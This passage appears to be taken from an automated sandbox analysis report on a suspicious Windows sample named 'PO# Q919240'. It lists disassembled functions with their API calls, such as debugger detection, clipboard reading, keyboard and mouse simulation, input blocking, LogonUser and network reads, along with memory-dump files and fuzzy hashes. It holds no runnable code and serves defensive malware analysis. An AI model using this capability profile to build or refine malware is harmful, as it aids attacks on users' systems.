                • __wsplitpath.LIBCMT ref: 00475644
                  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                • _wcscat.LIBCMT ref: 00475657
                • __wcsicoll.LIBCMT ref: 0047567B
                • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                • CloseHandle.KERNEL32(00000000), ref: 004756BA
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                • String ID:
                • API String ID: 2547909840-0
                • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                Function 00452492 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 128filesleepCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                • Sleep.KERNEL32(0000000A), ref: 0045250B
                • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                • FindClose.KERNEL32(?), ref: 004525FF
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                • String ID: *.*$\VH
                • API String ID: 2786137511-2657498754
                • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                Function 0041A208 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                • TerminateProcess.KERNEL32(00000000), ref: 00422004
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                • String ID: pqI
                • API String ID: 2579439406-2459173057
                • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                Function 0043333C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
                Download Yara Rule
                APIs
                • __wcsicoll.LIBCMT ref: 00433349
                • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                • __wcsicoll.LIBCMT ref: 00433375
                • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: __wcsicollmouse_event
                • String ID: DOWN
                • API String ID: 1033544147-711622031
                • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                Function 0044C37A Relevance: 7.6, APIs: 5, Instructions: 145windowkeyboardCOMMON
                Download Yara Rule
                APIs
                • GetKeyboardState.USER32(?), ref: 0044C3D2
                • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: KeyboardMessagePostState$InputSend
                • String ID:
                • API String ID: 3031425849-0
                • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                Function 00476619 Relevance: 7.6, APIs: 5, Instructions: 140networkCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ErrorLastinet_addrsocket
                • String ID:
                • API String ID: 4170576061-0
                • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                Function 0047A330 Relevance: 7.6, APIs: 5, Instructions: 71windowCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                • IsWindowVisible.USER32 ref: 0047A368
                • IsWindowEnabled.USER32 ref: 0047A378
                • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                • IsIconic.USER32 ref: 0047A393
                • IsZoomed.USER32 ref: 0047A3A1
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Window$EnabledForegroundIconicVisibleZoomed
                • String ID:
                • API String ID: 292994002-0
                • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                Function 0047839D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 228comCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                • CoInitialize.OLE32(00000000), ref: 00478442
                • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                • CoUninitialize.OLE32 ref: 0047863C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: CreateInitializeInstanceUninitialize_wcslen
                • String ID: .lnk
                • API String ID: 886957087-24824748
                • Opcode ID: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                • Opcode Fuzzy Hash: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                Function 0046DC80 Relevance: 6.1, APIs: 4, Instructions: 70clipboardCOMMON
                Download Yara Rule
                APIs
                • OpenClipboard.USER32(?), ref: 0046DCE7
                • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                • GetClipboardData.USER32(0000000D), ref: 0046DD01
                • CloseClipboard.USER32 ref: 0046DD0D
                • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                • CloseClipboard.USER32 ref: 0046DD41
                • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                • GetClipboardData.USER32(00000001), ref: 0046DD8D
                • CloseClipboard.USER32 ref: 0046DD99
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                • String ID:
                • API String ID: 15083398-0
                • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                Function 0044F430 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 458COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _memmove
                • String ID: U$\
                • API String ID: 4104443479-100911408
                • Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                • Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                Function 0045CAFA Relevance: 4.6, APIs: 3, Instructions: 130fileCOMMON
                Download Yara Rule
                APIs
                • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Find$File$CloseFirstNext
                • String ID:
                • API String ID: 3541575487-0
                • Opcode ID: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                • Opcode Fuzzy Hash: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                Function 004339B6 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                Download Yara Rule
                APIs
                • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                • FindClose.KERNEL32(00000000), ref: 004339EB
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: FileFind$AttributesCloseFirst
                • String ID:
                • API String ID: 48322524-0
                • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                Function 004422FE Relevance: 3.1, APIs: 2, Instructions: 89networkfileCOMMON
                Download Yara Rule
                APIs
                • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Internet$AvailableDataErrorFileLastQueryRead
                • String ID:
                • API String ID: 901099227-0
                • Opcode ID: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                • Opcode Fuzzy Hash: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                Function 0047EA6F Relevance: 2.0, APIs: 1, Instructions: 502COMMON
                Download Yara Rule
                APIs
                • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Proc
                • String ID:
                • API String ID: 2346855178-0
                • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                Function 0045A370 Relevance: 1.5, APIs: 1, Instructions: 24keyboardCOMMON
                Download Yara Rule
                APIs
                • BlockInput.USER32(00000001), ref: 0045A38B
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: BlockInput
                • String ID:
                • API String ID: 3456056419-0
                • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                Function 00436CD7 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                Download Yara Rule
                APIs
                • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: LogonUser
                • String ID:
                • API String ID: 1244722697-0
                • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
